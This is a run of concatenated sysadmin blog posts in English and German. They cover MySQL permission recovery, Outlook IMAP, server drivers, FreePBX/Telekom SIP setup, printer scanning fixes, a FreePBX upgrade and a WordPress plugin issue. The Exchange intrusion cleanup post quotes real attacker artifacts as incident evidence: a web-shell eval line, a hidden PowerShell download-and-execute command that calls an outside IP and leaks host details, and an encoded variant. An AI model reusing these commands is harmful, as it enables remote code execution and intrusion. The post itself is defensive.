i found out, that also other commands did not work and that the include_path of PEAR did cause some problem and no modules were loaded, so i moved the include_path to the end of the [PHP] section, and now phpmyadmin and mysqli and everything works like it should.
hope this helps someone out there! 🙂
]]>[ERROR] mysqld: Can't create/write to file '/usr/local/var/mysql/aria_log_control' after a while i noticed that man was not working anymore:
man-db: error while loading shared libraries: libmandb-2.8.1.so
slowly i started to understand that something serious did happen to the system. after executing
chmod o+x .
from / directory, also inside /lib/ and /lib/mysql/ and yes, man and mysql did work again!
afterwards i executed something, that i SHOULDNT execute:
chmod -R 755 /sbin /usr/ /lib /lib64 /var
as someone recommended it as you can see in the link to fix permissionproblems, and my courier-auth-daemon did not start anymore, while mysql was running again.
after a reboot ssh did not let me in anymore, cause the private key had 755 aswell.
i realized that the ownership for / was not root anymore, but another user, cause of a malfunction of a php-script. i ended up syncing the permissions from a backup back to the system using the find command as described here:
be carfeul, it took me a lot of time, to get another backup, cause i missunderstood the commands of this link. it means
find . -exec chmod -v --reference='{}' /path/to/target/'{}' \;copies the permissions from . (the folder you are in) to the /path/to/target/. – and not vice versa.
to copy the permissions from a target to the folder you’re currently inside, you need to use
find . -exec chmod -v –reference=/path/to/target/'{}‘ ‚{}‘ \;
…same as for chown….
so, in general: if you run into mysql-permission-problems check the rights of the entire hirachy and the owner of / ! this may help!
]]>after switching the offline mode or clicking on a another folder, moving a message, deleting a message, marking a message as read, or whatever performs any IMAP operation, the new mails appeared immediately, and from then on the problem was gone, until closing outlook completely and start it again.
basically after hours of testing and trying one of this two things must have fixed it:
first: i specify the root folder path with INBOX.
second, i closed outlook, deleted the OST file of the IMAP mailbox and restarted outlook. at the first startup outlook hang (on different clients), but after closing it with the task-manager and starting it again, it took a long time to download the IMAP-Mailbox, but after it was finished, the weird problem disappeared.
so it seems as the OST file was somehow corrupted – i tried before to fix it with the scanpst-command, but without success.
hope this helps somebody to shorten his day.
]]>At the beginning we had problems finding drivers for:
- Vendor ID 1022 (AMD) Device 1485 (Starship/Matisse Reserved SPP)
- Vendor ID 1022 (AMD) Device 148A (Starship/Matisse PCie Dummy Function)
- Vendor ID AMDI Device 0030
While the AMD support did not reply anything useful:
Dear Andi, Your service request : SR #{ticketno:[8201146762]} has been reviewed and updated.
Response and Service Request History:
Thank you for your email
I request you to provide exact make and model of your motherboard so that I can assist you better .
Also x570chipset drivers are meant for desktop and hence we do not have chipset driver for windows server 2022 .
Thank you for contacting AMD
…and also the ASRock Rack Support was not very helpful:
…. we just searched by ourself for drivers that may could work with our board, and fortunatelly we found some!
In a disucssion on the AMD community we found following Link:
https://support.hpe.com/hpsc/swd/public/detail?swItemId=MTX_af1f3d0cb7994732983242265e&swEnvOid=4249
And indeed, the drivers for the HPE ProLiant DL385 Gen10 Plus did the trick!
Now we can say, we have a fully working Microsoft Windows Server 2022 with a Ryzen 5900X on a Mainboard with an X570 Chipset and everything seems to be fully compatible!
Enjoy!
]]>Ganz kurz ein paar ganz kurze Erklärungen worüber wir sprechen:
NAT
Network-Adress-Translation wird in IPv4-Netzen genutzt, wenn mehrere Geräte hinter einem Router mit dem Internet verbunden sind. In meinem Fall befindet sich Asterisk/FreePBX hinter einem Router und ich möchte NICHT irgendwelche Ports extra am Router öffnen mĂĽssen, da dies ein Sicherheitsrisiko darstellt und Asterisk/FreePBX quasi ja nur ein „Client“ ist, der sich bei der Telekom anmelden soll.
PJSIP
Asterisk/FreePBX unterstĂĽtzt SRV-Lookups „so richtig“ wie ich gelesen habe nur in den neueren Versionen, und dort so „out of the box“ auch nur mit PJSIP. Der SIP-Treiber in Asterisk wird schon lange nicht mehr weiter entwickelt. Da wir bei einigen Systemen immer wieder mit PJSIP Probleme hatten, haben wir bislang immer weiterhin SIP eingesetzt, aber da die Telekom Ende Februar 2020 mit der „Telefonieanpassung“ den SRV-Lookup (NAPTR) zwingend voraussetzt ist man quasi gezwungen die „Trunks“ auf PJSIP um zu stellen.
Ein paar Hinweise gibt es dazu auch direkt bei der Telekom: https://telekom.de/telefonieanpassung
Vorsicht gilt hier ĂĽbrigens bei Yealink-Telefonen!
Die von der Telekome gemachten Angaben funktionieren nicht!
Wenn man bei Transprot DNS-NAPTR auswählt, wie es die Telekom in ihrem Screenshot zeigt, registriert sich das Telefon nicht. Es genĂĽgt den Proxy wie im Screenshot der Telekom angegeben, anzugeben, und die Portnummern auf 0 zu stellen. Danach ist eine Registrierung erfolgreich und laut Telekom sind die Endgeräte „an der richtigen Plattform“ registriert!
Gut, kommen wir nun zu der FreePBX/Asterisk-Konfiguration.
Zunächst einmal kursieren verschiedenste Informationen zu „was die Telekom unterstĂĽtzt und was nicht“, meist von Leuten, die diese Information „IRGENDWO“ her haben. Orientieren sollte man sich indes aber einfach an die Schnittstellenspezifikation der Telekom, die TR114.
https://www.telekom.de/hilfe/downloads/1tr114.pdf
Audio-Codec
Dort wird für VoIP zum Beispiel ausschließlich vom Codec aLaw und G722 gesprochen. Alles andere ist entsprechend unsinnig. Es ist aber im Grunde egal, ob man in FreePBX / Asterisk die anderen Codecs deaktiviert, weil sich Telekom/Asterisk sowieso im Vorfeld auf einen gemeinsam verfügbaren Codec einigen. Einzig interessant ist die Reihenfolge. Möchte man, dass bevorzugt G722 mit höherer Sprachqualität genutzt wird, sollte man den Codec auch an die oberste Stelle verschieben.
RTP-Port-Range
Zudem kursieren verschiedene Port-Angaben fĂĽr RTP (Real Time Protocol) – also das Protokoll, mit welchem der Audio-Daten-Stream verschickt wird. Hierzu macht die Telekom keine Angabe! Die Standard-Einstellungen von FreePBX/Asterisk mit 10.000 bis 20.000 können beibehalten werden.
Benutzernamen und Kennwort
Man findet verschiedenste Angaben zu den Zugangsdaten, wo diese ĂĽberall eingetragen werden mĂĽssen und wie diese lauten. Richtig ist jedoch ausschlieĂźlich folgendes:
Der Benutzername kommt bei PJSIP unter Allgemein in das Feld Username und das Kennwort wird unter Kennwort eingetragen, wobei das Kennwort aber nur beim SIP-Trunk notwendig ist! Bei den ALL-IP-AnschlĂĽssen funktioniert die authentifizierung ĂĽber die Internt-Einwahl und es genĂĽgt die Angabe des Benutzernamens, und der Benutzername ist dabei immer die Zugangsnummer
AOR-Daten
Die AOR-Daten sind meines erachtens nicht notwendig! Telefonie funktioniert ohne Probleme ohne diese Daten, sowohl beim SIP-Trunk, als auch beim All-IP-Anschluss
Registrierung aber keine eingehenden Gespräch
Beim SIP-Trunk hatte ich das Problem, dass FreePBX zwar registriert war, aber eingehende Pakete nicht ankamen. Mit Wireshark konnte ich herausfinden, dass ĂĽberhaupt keine INVITE-Pakete von der Telekom ankamen. Nach weiterer Analyse habe ich herausgefunden, dass Asterisk fĂĽr die Registrierung im VIA/Contac Header einfach eine völlig falsche, mir unbekannte IP eingetragen hatte. Nach etwas Googlen nach „Asterisk wrong Contact Header“ stoĂź ich in einem Forumsbeitrag auf den Hinweis: Das Benutzen des Wildcard-Bindings ist problematisch!
Die Einstellung, wie sie ĂĽberall im Internet zu finden ist:
ist entsprechend problematisch – dont do it! auch nicht wenn es vielleicht mal funktioniert, so wie da bei uns auch mal der Fall war – bis dann zum nächsten Tag…!
Nach dem ich die Einstellung geändert hatte, sodass das Binding an die IP der Schnittstelle des FreePBX-Systems geht:
und im Trunk den Transport erneut zugewiesen habe (weil der sonst zurĂĽck auf UDP umschaltet wenn das noch aktiviert ist):
kamen endlich Pakete auf der Anlage an! FREUDE! Zwar mit der Fehlermeldung unable to retrieve PJSIP transport aber nach einem Neustart von Asterisk war das gelöst, und plötzlich funktionierte die eingehende Telefonie endlich! Den Contact-Header habe ich nicht mehr kontrolliert, aber er muss ja jetzt stimmen, sonst kämen die Daten ja nicht an.
Beim ALL-IP-Anschluss hatte ich ein ähnliches Problem. Hier kamen die Pakete zwar am Router an, aber nicht auf dem Port, auf dem Asterisk sie rausgeschickt hatte, sondern auf Port 5061, den Port, den ich im PJSIP-Treiber unter binding angegeben hatte, was dazu führte, dass die Telefonie nur mit einer Portfreigabe von Port 5061 möglich war, was ein Sicherheitsrisiko darstellt und keine schöne Lösung ist.
Nachdem ich also auch bei einem All-IP Anschluss den hier zu verwendeten UDP-Transport an die IP der Schnittstelle des FreePBX zu binden, und nicht an die WildCard-Adresse, musste ich in den Trunks noch die Option Force rport wieder deaktivieren (siehe Screenshot), die vorher aktiv war. In den Channel-Treiber-Einstellungen muss zudem zwingend ein „Port to Listen On“ (bei mir 5061, weil 5060 hier schon vom SIP-Treiber benutzt wird) eingetragen sein, da sonst keine Funktion mehr gewährleistet war, und die Anrufe wieder nicht rein kamen. Beim Telekom-SIP-Trunk hingegen war die Angabe des Ports unter TCP-Transport irrelevant und nicht nötig.
Ausserdem musste auch noch im Trunk unter allgemein der SIP Server Port heraus genommen werden
TLS statt TCP benutzen!
Am Ende hatte ich aber selbst mit dieser Konfiguration weiterhin Probleme, und ohne Portfreigabe im Router gab es immer wieder das Phänomen, dass die Rufnummern nach einer Zeit nicht mehr erreichbar waren. Schlussendlich zum Erfolg geführ hat, TLS zu aktivieren und als Transport zu verwenden! Ich kann nur jedem genau das empfehlen, dann werden auch keine Portweiterleitungen im Router nötig, die ein Sicherheitsrisiko darstellen!
]]>While the protocol just showed up Error 34-0000 (which means „conenction error“), nothing worked from one to another day without chaging anything on the machine or on the server. I tried all different SMB protocol versions (could be possibly caused by an server-side-update and version change…), i tried enabling DNS-Request (although we didnt used hostnames anyway, but because another guy reported, that this helped in his case..), but nothing helped. Finally i called the Sharp-Support.
Solution is surprising, but simple: Go To System-Settings -> Job Log -> Job Log Operation -> Delete Job Protocol.
After that, reboot the System, and et voila! Scan works like before
and now for our german friends:
Heute habe ich das Scan to SMB an einem Sharp MX-2651 mit dem Support von Sharp entstört. Das Protokoll zeigte nur Fehler 34-0000 (das bedeutet einfach nur Verbindungsproblem), und die Scan-Funktion ging plötzlich einfach nicht mehr von einen auf den anderen Tag, ohne das etwas geändert wurde.
Die Lösung: Einstellungen für System -> Protokoll der Aufträge -> Protokoll bearbeiten -> Job-Protokoll löschen, Löschen, danach das Gerät noch einmal neu starten! Und zack, geht es wieder.
Der Support-Mitarbeiter meinte noch: „Naja, normal passiert das eher mal wenn das Gerät mit 99.999 Einträgen ĂĽberläuft (was hier nicht der Fall war) , aber manchmal kann das auch so passieren“. Ich finde, das ist ein ganz schöner Murks… die Web-GUI ist auch super ugly! Aber was wirklich cool ist, ist, dass man das Display per VNC fernsteuern kann! Das habe ich so noch bei keinem anderen Gerät gesehen.
Ich freue mich immer ĂĽber Kommentare und ein kurzes „Danke“ – wenn euch das geholfen hat 🙂
Hier noch ein Screenshot der zur Lösung führenden Seite:
Achtung, haltet euch fest: Der Benutzername fĂĽr die SMTP Authentifizierung muss ganz unten in das Feld
Kostenstelle
eingetragen werden – zumindest bei folgendem Firmware-Stand:
ROM-Version Controller A3GN30G0851-W99
ROM-Version Druckeinheit A3GN0Y00050G002100
Boot-ROM-Version A3GN99G0100-999
ROM-Version Panel A3GN02G0152-999
ROM-Version Scanner A3GN23G0102-999
ROM-Version Faxplatine A6ED40G1201-999
Der Eintrag E-Mail-Adresse des Gerätes ist NICHT der Benutzername der Authentifizierung!
Das ganze konnte ich nur herausfinden, weil ich auf dem Mailserver den Eintrag im Logfile entdeckt hatte, als ich verzweifelt nach Fehlern gesucht habe, und Scan2Mail einfach nicht funktionierte und ich im Logfile sehen konnte, dass die Authentifizierung fehl schlug. Das Gerät selbst sagt ja leider nichts auser „FEHLER“ im Auftragsverlauf.
Der Verantwortliche bei KonicaMinolta hat Glück, dass ich seinen Namen nicht kenne, ich würde ihn jetzt sonst vermutlich töten!
Es ist so ätzend, dass wir Admins die schlampige Arbeit der Produktentwicklung immer und immer wieder aussbaden müssen.
Ich möchte nicht wissen, wieviele Admins das schon Stunden an Lebenszeit gekostet hat. Ein trauriges Zeugnis von KonicaMinolta, auch dass sie es immernoch nicht geschafft haben bei dem Gerät einen „Test-Button“ einzubauen, sodass man den Versand von der WebGUI testen kann…..
]]>detecting intrusions:
i began with the powershell-script microsoft offered to check if the system could be attacked, but the result of the script was not leading me to the suspicous files.
so i was checking different folders by hand and looked for new aspx-files, as the document of the BSI in germany told me to do. i found aspx-files, which were located in c:\inetpub\wwwroot\aspnet_client\
0QWYSEXe.aspx – load.aspx and logaaa.aspx.
as we can see, there were multiple attacks, starting from 05.03.2021.
inside the aspfile are external url’s like this:
ExternalUrl : http://f/<script language=“JScrpit“ runat=“server“>funciton Page_Load(){eval(Request[„Load“],“unsafe“);}</script>
as i red about zip-files and dumps that would have been uploaded in other cases, i used my favorite file manager total commander to search for all files that was changed more than a day ago (cause i installed os-updates already today), but not longer ago than 8 days.
i recognized some files in C:\Windows\Microsoft.NET\Framework64\v4.0.30319 which had the same name than the aspx files but ending with .compiled
in the same directory were two dll files with suspicious name (App_web_lzeymprh.dll for example) and date.
„removal“ of the intrusion:
i moved the dll files, the compiled files and also the aspx-files of course to another directory
a more easy and automatic way, that will check your whole system is to use the free thor lite scanner, that i can highly recommend!
you need to give information like name and email adress to obtain a license-file to use the scanner, but the scanner scans all your system:
it did found all the aspx files in my case, but not the dll-files.
i checked the task-manager for suspicous processes and found one, indeed, there was a powershell-sub-process of cmd.exe:
powershell -nop -w hidden -ep bypass -c „IEX (New-Object Net.WebClient).downloadstring(‚http://188.166.162.201/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True‘)“
i checked it with the process explorer – the process was running since 8.3.2021 at 2:57:09 and did E/A Read more than 73.000.000 bytes.
this ip-adress is located in the USA.
i installed all patches for the exchange server, includig the last one from march.
after a reboot the powershell process was there again!
on my system i could find a planned task, that starts this powershell-command:
powershell -ep bypass -e SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AYwBkAG4ALgBjAGgAYQB0AGMAZABuAC4AbgBlAHQALwBwAD8AaABpAGcAMgAxADAAMwAwADUAJwApAA==
i deleted the planned task and killed th process.
i also scanned the drive for files containing the ip-address with my favorite file manager total commander:
so if you are not sure if some files have been transferred, maybe you can check the logfiles system32\winevt\logs\Windows PowerShell.evtx
by the way, also the thor-lite scanner did register the powershell-execution, as you can see while my search found the txt logfile on my download-folder, but unfortunatelly it was not mentioned in the human easy readble html-log result.
in the txt file following data was logged:
Mar 9 10:29:29 Exchange/148.xxx.xxx.xxx THOR: Info: MODULE: ProcessCheck MESSAGE: Process info SCANID: S-8DAnIqx3lyo PID: 11888 PPID: 12284 PARENT: NAME: cmd.exe OWNER: NT-AUTORITĂ„T\SYSTEM COMMAND: „C:\windows\system32\cmd.exe“ /c powershell -nop -w hidden -ep bypass -c „IEX (New-Object Net.WebClient).downloadstring(‚http://188.166.162.201/update.png?v&mac=00-50-56-00-C1-2F&av=&version=6.3.9600&bit=64-Bit&flag2=True&domain=customers.comfine.de&user=EXCHANGE$&PS=True‘)“ PATH: C:\windows\system32\cmd.exe CREATED: Mon Mar 8 02:57:08 2021 MD5: 622d21c40a25f9834a03bfd5ff4710c1 CONNECTION_COUNT: 0 LISTEN_PORTS: FILE_1: C:\windows\system32\cmd.exe EXISTS_1: yes CREATED_1: Wed Jun 3 10:16:43 2015 MD5_1: 622d21c40a25f9834a03bfd5ff4710c1 SHA1_1: 98a9ac93fe31f38f47f38db78bf12fa0c6214f9a SHA256_1: 48985b22a895154cc44f9eb77489cfdf54fa54506e8ecaef492fe30f40d27e90 FIRSTBYTES_1: 4d5a90000300000004000000ffff0000b8000000
this article is no guarantee that there is nothing left on the system! i will now do further analyzis and will update this article, if theres some useful information.
next step will be now, to try the safety scanner that microsoft published in january this year and update recently.
small update: the ms scanner did find NOTHING, no surprise, i didnt expect microsoft to provide a useful tool anyway…..
one more update: seems as the scanner was not executed correctly the first time – within the next run, it could find some infections and removed them… so the scanner seems to be worth a try
good luck with your exchange-systems! and dont forget to leave a comment and a thank you! 🙂
]]>i tried to upgrade from 14 to 15 with the FreePBX upgrader tool (https://wiki.freepbx.org/display/FOP/Upgrade+to+FreePBX+15)
tried to do it with
fwconsole versionupgrade
aswell without success.
ran into problems with the framework module:
fwconsole ma install framework
Updating tables admin, ampusers, cronmanager, featurecodes, freepbx_log, freepbx_settings, globals, module_xml, modules, notifications, cron_jobs…Erledigt
PHP Fatal error: Call to a member function writeln() on string in /var/www/html/admin/modules/framework/install.php on line 38
Whoops\Exception\ErrorException: Call to a member function writeln() on string in file /var/www/html/admin/modules/framework/install.php on line 38
Stack trace:
- Whoops\Exception\ErrorException->() /var/www/html/admin/modules/framework/install.php:3
so i tried to fix this with:
[root@localhost ~]# yum reinstall freepbx
but ended up with:
Loaded plugins: fastestmirror, versionlock
Loading mirror speeds from cached hostfile
Installed package freepbx-14.1-1.sng7.noarch not available.
so i tried the usual install command that failed aswell:
yum install freepbx
Loaded plugins: fastestmirror, versionlock
Loading mirror speeds from cached hostfile
Package: freepbx-14.1-1.sng7.x86_64 – can’t co-install with freepbx-14.1-1.sng7.noarch
Nothing to do
i tried to remove freepbx that failed:
[root@localhost ~]# yum remove freepbx
Loaded plugins: fastestmirror, versionlock
Resolving Dependencies
–> Running transaction check
—> Package freepbx.noarch 0:14.1-1.sng7 will be erased
–> Processing Dependency: freepbx for package: sangoma-pbx-2012-1.sng7.noarch
–> Running transaction check
—> Package sangoma-pbx.noarch 0:2012-1.sng7 will be erased
–> Finished Dependency Resolution
Error: Trying to remove „sangoma-pbx“, which is protected
deleted the protection with
rm /etc/yum/protected.d/sangoma-pbx.conf
then
yum remove freepbx
then
yum install freepbx
then
fwconsole ma install framework
that should not fail anymore now!
fwconsole ma updateall
should work aswell.
freepbx gui was working then, but could not connect to asterisk.
res_odbc.c: res_odbc: Error SQLConnect=-1 errno=1045 [unixODBC][MySQL][ODBC 5.2(w) Driver]Access denied for use r ‚freepbxuser’@’localhost‘
edit /etc/asterisk/modules.conf and comment out chan_local.so
;preload = chan_local.so
create missing file:
touch /etc/asterisk/extconfig_custom.conf
chown asterisk:asterisk extconfig_custom.conf
now after asterisk could be started again i ran
asterisk-version-switch
again and „switched“ to the already running version 18 again, that re-installed sangoma-pbx-2012-1.sng7.noarch
not sure if this was installed before aswell – but at the end the problem remained.
final solution
soo… i started again with the backup i made at the beginning! if you ran into this situation without a backup, i think youre lost! backup your configuration and start from scratch.
i just followed this guide step by step in the exact same order:
https://community.freepbx.org/t/how-to-upgrade-from-freepbx-14-to-15-from-command-line/71770
except, that i ran fwconsole chown after installing the version-upgrade-module again, because rights were not fine anymore…
and now the system is up to date with freepbx 15.0.17.24 and running without any problems! this means: while the GUI of the versionupgrade module destroyed my system, the steps described at the commandline worked without any problems!
so my advice to you: never use the GUI for upgrading from 14 to 15! system will probaply „unrepairable“ broken afterwards! this happened to me on two different machines! and on both machines the method via commandline worked without any problem! good luck, i hope you have a backup!
]]>for one website i got the message that the URL Live-Test failed. i should try again in some hours again.
i waited some weeks and today i tried again. without success.
after i googled for a solution, added a robots.txt, tried again and again after some speed-optimizations i created a complete empty website for this domain temporarily to check if this works, and yes, it did.
so i switched back to my wordpress website and pressed the restest-button. failed again.
as next logical step i disabled all plugins and tested again. it worked.
then i wanted to enable all plugins step by step to see which plugin causes google LIVE-URL test to fail, i began with the „Elementor“-Plugin, and it failed already, just with this plugin enabled.
as next step i enabled all other plugins. they do not make any problems, but as soon as elementor is enabled the URL Live-Test fails.
As next step i went into my OneTone Theme Onepage with Elementor and switched over to the Revision-Tab in the history and enabled the very first version of the theme and then did the Google LIVE-URL test again, and voila – it worked.
as next step i re-enabled my actual version of my theme and removed all sections of the theme, beside the top. worked.
so after removing different sections i could track down the problem to two sections: the shop-section (content from Music Store – WordPress eCommerce), and the live-section (content from gigpress). i disabled both, but problem persisted. so i deactivated magee shortcodes also and problem was gone.
i enabled gigpress and music store again and problem still didnt come back, so at the end magee shortcodes did cause the problem somehow.
i am not sure if something i dont use right now is not working anymore wihtout it, but as for now i dont see a difference, so i just keep it off and my world is fine now, happy google URL Testing.
hope this helps someone else, if so, leave a comment!
cheers from the webadmin-hell.
]]>